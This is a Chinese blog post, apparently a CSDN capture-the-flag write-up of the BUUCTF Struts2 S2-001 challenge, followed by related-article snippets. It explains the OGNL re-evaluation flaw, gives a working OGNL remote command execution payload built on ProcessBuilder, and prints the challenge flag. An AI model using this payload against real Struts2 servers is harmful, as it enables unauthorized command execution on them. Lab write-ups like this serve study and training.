BUUCTF-Real-[struts2]s2-001

最新推荐文章于 2024-08-16 23:08:28 发布
最新推荐文章于 2024-08-16 23:08:28 发布
阅读量352 收藏 6
点赞数 6
分类专栏: 漏洞复现与研究 文章标签: java struts
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/136051190
版权

漏洞描述

struts2漏洞 S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。例如,在注册或登录页面中,如果提交失败,则服务器通常默认情况下将返回先前提交的数据。由于服务器用于%{value}对提交的数据执行OGNL表达式解析,因此服务器可以直接发送有效载荷来执行命令。

漏洞poc验证

 经过poc验证,我们发现 [struts2]s2-001 存在rce漏洞!

paylaod

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

漏洞利用

打印出当前路径!根据题目,我们只需要把环境变量打印出来即可!也就是 " env "

 flag{59eb58d0-dbaf-4206-aa26-dc4d75fcf19f}

真的学不了一点。。。
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Apache Struts2远程代码执行漏洞(S2-001)复现
asd158923328的博客
08-21 760
根据题意 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 S2-001 原理:该漏洞其实是因为用户提交表单数据并且验证失败时,后端会将用...
Buuctf [struts2]s2-001
ch258563的博客
06-09 219
Buuctf [struts2]s2-001
[struts2]s2-001
satasun的博客
12-09 250
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
buuctf [struts2]s2-001
qq_1873822的博客
03-16 607
漏洞原理 Struts 2 框架的表单验证机制( Validation )主要依赖于两个拦截器:validation 和 workflow。validation 拦截器工作时,会根据 XML 配置文件来创建一个验证错误列表;workflow 拦截器工作时,会根据 validation 拦截器所提供的验证错误列表,来检查当前所提交的表单是否存在验证错误。 在默认配置下,如果 workflow 拦截器检测到用户所提交的表单存在任何一个验证错误,workflow 拦截器都会将用户的输入进行解析处理,随即返回并显示
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3802
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
【研究】Struts2漏洞之S2-001漏洞环境和POC
god_Zeo的安全博客
07-01 2113
【研究】Struts2漏洞之S2-001漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{v...
real-fixed-cam
05-20
"real-fixed-cam"是这一技术中的一种特定模型,专门用于处理真实场景下固定摄像头拍摄的图像。在这个模型中,"real"意味着它在实际场景中进行了训练和测试,确保了对真实世界图像的良好适应性;"fixed-cam"则表明该...
Real-time Operating Systems Book 2 – The Practice
09-11
Unfortunately the practice may a bit more challenging, especially in the field of real-time operating systems. First, you need a sensible, practical toolset on which to carry out the work. Second, ...
tencent-real time stream recommendation
01-16
in most web applications, accurate real-time recommendation in the context of big data is of high demand. Traditional recommender systems that analyze data and update models at regular time intervals ...
real-hand-held
05-20
在IT领域,尤其是在计算机视觉和图像处理方面,"real-hand-held"是一个重要的概念,它通常与数据集或模型训练有关。这个资源似乎是指一个特定的数据集,名为"real-hand-held",是Background-Matting系列的四个模型之...
"Sim-to-Real: Learning Agile Locomotion For Quadruped Robots"代码
02-09
本文将深入探讨"Sim-to-Real: Learning Agile Locomotion For Quadruped Robots"这一主题,主要基于提供的代码库sim2real_code,来阐述如何通过模拟训练实现四足机器人的敏捷行走。 一、四足机器人敏捷行走的挑战 ...
buuctf [struts2]s2-016
qq_1873822的博客
03-17 529
漏洞原理 DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令 https://blog.csdn.net/u011721501/article/details/41735885 任意命令执行 index.action?redirect:%24%7B%23context%5.
BUUCTF REAL
A_dmin的博客
01-30 4313
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
buuctf [struts2]s2-046
qq_1873822的博客
03-19 363
漏洞描述 使用Jakarta插件,程序没有正确处理文件上传,通过构造HTTP请求头中的Content-type造成RCE
buuctf [struts2]s2-008
qq_1873822的博客
03-19 515
漏洞概述 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋 第四种需要开启devModedebug模式。 https://www.freebuf.com/articles/web/25337.html POC devmode.acti
墨者学院_Apache Struts2远程代码执行漏洞(S2-001)
cc_de_csdn的博客
08-26 759
1.由题可得漏洞为S2-001,可知用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中,所以可以直接构造 Payload 进行命令执行。 2.在密码处输入%{1+1}得到回显是2确认漏洞存在。 3.构造任意执行payload: %{ #a=(new java.lang.ProcessBuilder(new ...
Struts2 漏洞复现之s2-001
weixin_51220765的博客
12-14 987
Struts2 漏洞复现之s2-001 原理: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 复现步骤 1. 进入vulhub目录下漏洞环境的目录 cd vulhub-master/struts2/s2-001
JAVA进阶补充
2301_80150315的博客
08-15 751
概念:把已经有的方法拿过来用,当作函数式接口中抽象方法的方法体条件:引用处必须是函数式接口被引用的方法需要已经存在被引用方法的形参和返回值需要跟抽象方法的形参和返回值保持一致被引用方法的功能需要满足当前需求:方法引用符意义:就是为让控制台的报错信息更加的见名知意自定义异常的步骤:定义异常类写继承关系空参构造带参构造​file对象就表示一个路径,可以是文件的路径、也可以是文件夹的路径;这个路径可以是存在的,也允许是不存在的构造方法描述根据文件路径创建对象。
手撕快排——三种实现方法(附动图及源码)
最新发布
jsjs1346的博客
08-16 539
🤖💻👨‍💻👩‍💻🌟🚀🤖🌟👨‍💻👩‍💻👨‍💻👩‍💻🚀是一种高效的排序算法,广泛应用于各种场景。它采用策略,将一个数组分成两个子数组,然后递归地对这两个子数组进行排序。本文将介绍三种快速排序的实现方法,并附上相应的源码。⚙️一、快速排序的基本原理一个基准元素(pivot)分成两个子数组递归合并O(n log n)O(n log n)O(n^2)后文我们将给出优化方案O(log n)📚三、实现霍尔方法是快速排序原始版本中使用的分区方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值